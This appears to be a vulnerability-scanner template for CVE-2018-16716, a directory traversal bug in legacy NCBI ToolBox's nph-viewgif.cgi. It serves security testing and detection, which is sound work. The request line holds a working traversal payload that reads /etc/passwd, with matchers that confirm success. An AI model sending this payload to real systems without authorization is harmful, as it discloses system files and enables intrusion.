id: CVE-2018-16716

info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure)
    or file deletion via the nph-viewgif.cgi query string.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
  tags: cve,cve2018,ncbi,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200